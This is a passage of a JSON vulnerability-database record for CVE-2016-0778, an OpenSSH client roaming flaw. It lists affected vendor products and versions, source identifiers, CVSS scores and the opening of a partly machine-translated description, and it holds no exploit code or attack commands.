"vendor": "ibm", "version": "1.1" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.0" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.3.0.0" }, { "model": "junos 12.1x46-d35", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "purepower integrated manager kvm host", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "pan-os", "scope": "ne", "trust": 0.3, "vendor": "paloaltonetworks", "version": "7.1.3" }, { "model": "purview", "scope": "ne", "trust": 0.3, "vendor": "extremenetworks", "version": "7.0" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "7.0.5" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "7.0" }, { "model": "junos 15.1x49-d40", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.13" }, { "model": "mac os", "scope": "ne", "trust": 0.3, "vendor": "apple", "version": "x10.11.4" }, { "model": "linux ia-64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.0.17" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "6.5" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.1.10" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.0.18" }, { "model": "ids/ips", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.50" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "7.0.1" }, { "model": "junos 13.3r2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.11" }, { "model": "extremexos", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "15.7" }, { "model": "junos 15.1x49-d15", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos 12.1x46-d20", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.8" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.1" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.2" }, { "model": "linux x86 64 -current", "scope": null, "trust": 0.3, "vendor": "slackware", "version": null }, { "model": "nac appliance", "scope": "ne", "trust": 0.3, "vendor": "extremenetworks", "version": "7.0.3" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1.0.0" }, { "model": "junos 14.1r3", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.0.10" }, { "model": "junos 12.1x46-d45", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.0.14" }, { "model": "junos 13.3r5", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos 15.1r1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "6.2p1", "scope": null, "trust": 0.3, "vendor": "openssh", "version": null }, { "model": "junos 12.1x47-d11", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "purepower integrated manager vhmc appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0" }, { "model": "junos 15.1x49-d10", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.1.2" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4.0.0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "junos 15.1f3", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.10" }, { "model": "extremexos", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "16.1.2" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.0.8" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.0.1" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "7.0.8" }, { "model": "netsight appliance", "scope": "ne", "trust": 0.3, "vendor": "extremenetworks", "version": "6.3.0.179" }, { "model": "extremexos patch", "scope": "ne", "trust": 0.3, "vendor": "extremenetworks", "version": "15.7.38" }, { "model": "junos 15.1r2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos 15.1f2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "nac appliance", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "5.0" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.37" }, { "model": "junos 12.3r11", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.0.5" }, { "model": "junos 15.1x49-d20", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "netsight appliance", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "5.0" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.1.4" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "6.6" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "6.1.2" }, { "model": "junos 14.1r5", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "6.4" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.3" }, { "model": "nac appliance", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "6.0" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "6.0.70" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.9.5" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "5.7" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.1" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.4.0" }, { "model": "5.6p1", "scope": null, "trust": 0.3, "vendor": "openssh", "version": null }, { "model": "nsm4000", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "junos 13.3r6", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos 12.1x47-d20", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3" }, { "model": "netsight appliance", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "6.0" }, { "model": "junos 14.1r7", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos 14.1r1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "virtual customer access system", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "14.06" }, { "model": "junos 12.1x46-d10", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "extremexos", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "16.2" }, { "model": "linux -current", "scope": null, "trust": 0.3, "vendor": "slackware", "version": null }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.1.5" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "6.1.9" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.0.9" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.0.15" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.0.0" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.11.2" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.1" }, { "model": "junos 12.1x47-d10", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "nac appliance", "scope": "ne", "trust": 0.3, "vendor": "extremenetworks", "version": "6.3.0.179" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.0.4" }, { "model": "opensuse evergreen", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11.4" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.37" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "5.8" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.1.0" }, { "model": "junos 14.1r4", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "15.10" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "virtual customer access system", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "15.07" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.0" }, { "model": "identifi wireless", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "10.11" }, { "model": "tivoli provisioning manager for images", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.0" }, { "model": "7.1p2", "scope": "ne", "trust": 0.3, "vendor": "openssh", "version": null }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "6.0" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "7.0.4" }, { "model": "junos 12.3x48-d25", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos 12.3x48-d15", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.0" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "7" }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "14.04" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "extremexos patch", "scope": "ne", "trust": 0.3, "vendor": "extremenetworks", "version": "15.7.31" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.4" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "6.0.13" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "5.5" }, { "model": "linux", "scope": null, "trust": 0.3, "vendor": "gentoo", "version": null }, { "model": "mac os security update", "scope": "ne", "trust": 0.3, "vendor": "apple", "version": "x2016-0020" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "6.8" }, { "model": "junos 14.2r6", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.1.3" }, { "model": "junos 12.3x48-d30", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "6.0" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "netsight appliance", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "4.4" }, { "model": "junos 12.1x47-d25", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.0" }, { "model": "junos 12.3r12", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "purepower integrated manager appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "flex system chassis management module 2pet", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.11.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.12" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.5" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "7.0.7" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.2" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.0.2" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.19" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "6.0.6" }, { "model": "junos 15.1f1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "7.1.2" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "6.0.12" }, { "model": "junos 13.3r1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.1" }, { "model": "opensuse", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "13.1" }, { "model": "junos 12.1x46-d30", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "extremexos", "scope": "ne", "trust": 0.3, "vendor": "extremenetworks", "version": "16.2.1" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.11.3" }, { "model": "junos 13.3r8", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "6.3" }, { "model": "junos 13.3r3", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos 12.1x46-d25", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "6.2p2", "scope": null, "trust": 0.3, "vendor": "openssh", "version": null }, { "model": "junos 12.3x48-d20", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "linux ia-32", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "7.1" }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "linux mips", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "purview", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "0" }, { "model": "nac appliance", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "5.1" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "6.1.3" }, { "model": "junos 12.1x46-d36", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "purview", "scope": "ne", "trust": 0.3, "vendor": "extremenetworks", "version": "6.3" }, { "model": "junos 14.2r4", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.0.6" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.1" }, { "model": "junos 15.1r3", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.3.0" }, { "model": "netsight appliance", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "5.1" }, { "model": "junos 12.1x46-d40", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "7.1.1" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.1" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "6.9" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "7.1" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "6.2" }, { "model": "junos 15.1x49-d30", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.4.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.6" }, { "model": "linux s/390", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "virtual customer access system", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "16.05" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.14" }, { "model": "junos 13.3r9", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0.0" }, { "model": "remote device access", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8.1" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.1.9" }, { "model": "junos 14.2r3", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos 14.2r5", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.0" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "tivoli provisioning manager for images", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x7.1.1.0" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "5.4" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.0.7" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.0.0" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "6.1.00" }, { "model": "remote device access", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "8.7" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.0" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2" }, { "model": "junos 15.1f5", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos 13.3r7", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos 14.2r1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.3" }, { "model": "junos 12.1x46-d15", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.1" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "5.6" }, { "model": "smartcloud provisioning for software virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "junos 12.1x47-d15", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "junos 14.1r2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "6.1" }, { "model": "extremexos", "scope": "eq", "trust": 0.3, "vendor": "extremenetworks", "version": "15.7.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.11" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.20" }, { "model": "junos 12.1x47-d35", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "6.1.4" }, { "model": "junos 12.3x48-d10", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "junos 12.1x46-d26", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0.1" }, { "model": "identifi wireless", "scope": "ne", "trust": 0.3, "vendor": "extremenetworks", "version": "10.11.1" }, { "model": "p2", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "5.8" }, { "model": "netsight appliance", "scope": "ne", "trust": 0.3, "vendor": "extremenetworks", "version": "7.0.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.9" }, { "model": "purepower integrated manager power vc appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "opensuse", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "13.2" }, { "model": "junos 12.3r10", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "tivoli provisioning manager for images", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.19" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "6.0.5" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "7.0" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "15.04" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "5.1.1" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "6.0.9" }, { "model": "pan-os", "scope": "eq", "trust": 0.3, "vendor": "paloaltonetworks", "version": "6.1.10" }, { "model": "junos 14.1r6", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.10.5" }, { "model": "6.9p1", "scope": null, "trust": 0.3, "vendor": "openssh", "version": null } ], "sources": [ { "db": "CERT/CC", "id": "VU#456088" }, { "db": "BID", "id": "80698" }, { "db": "JVNDB", "id": "JVNDB-2016-001117" }, { "db": "CNNVD", "id": "CNNVD-201601-250" }, { "db": "NVD", "id": "CVE-2016-0778" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:openbsd:openssh", "vulnerable": true }, { "cpe22Uri": "cpe:/o:apple:mac_os_x", "vulnerable": true }, { "cpe22Uri": "cpe:/o:oracle:linux", "vulnerable": true }, { "cpe22Uri": "cpe:/o:oracle:solaris", "vulnerable": true }, { "cpe22Uri": "cpe:/a:sophos:unified_threat_management_software", "vulnerable": true }, { "cpe22Uri": "cpe:/a:hp:remote_device_access_virtual_customer_access_system", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2016-001117" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Qualys Security Advisory team", "sources": [ { "db": "BID", "id": "80698" } ], "trust": 0.3 }, "cve": "CVE-2016-0778", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "HIGH", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 3.9, "id": "CVE-2016-0778", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 1.9, "vectorString": "AV:N/AC:H/Au:S/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "HIGH", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 3.9, "id": "VHN-88288", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:H/AU:S/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "HIGH", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitabilityScore": 2.2, "id": "CVE-2016-0778", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.8, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2016-0778", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2016-0778", "trust": 0.8, "value": "High" }, { "author": "CNNVD", "id": "CNNVD-201601-250", "trust": 0.6, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-88288", "trust": 0.1, "value": "MEDIUM" }, { "author": "VULMON", "id": "CVE-2016-0778", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULHUB", "id": "VHN-88288" }, { "db": "VULMON", "id": "CVE-2016-0778" }, { "db": "JVNDB", "id": "JVNDB-2016-001117" }, { "db": "CNNVD", "id": "CNNVD-201601-250" }, { "db": "NVD", "id": "CVE-2016-0778" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "The (1) roaming_read and (2) roaming_write functions in roaming_common.c in the client in OpenSSH 5.x, 6.x, and 7.x before 7.1p2, when certain proxy and forward options are enabled, do not properly maintain connection file descriptors, which allows remote servers to cause a denial of service (heap-based buffer overflow) or possibly have unspecified other impact by requesting many forwardings. OpenSSH client code versions 5.4 through 7.1p1 contains a client information leak vulnerability that could allow an OpenSSH client to leak information not limited to but including private keys, as well as a buffer overflow in certain non-default configurations. In addition, JVNVU#95595627 Then CWE-122 It is published as CWE-122: Heap-based Buffer Overflow http://cwe.mitre.org/data/definitions/122.htmlA large amount of transfer is requested by the remote server, resulting in a denial of service ( Heap-based buffer overflow ) It can be unspecified, such as being put into a state. OpenSSH is prone to a heap-based buffer-overflow vulnerability. \nSuccessful exploits may allow attackers to execute arbitrary code in the context of the affected application. Failed attacks will cause denial-of-service conditions. OpenSSH (OpenBSD Secure Shell) is a set of connection 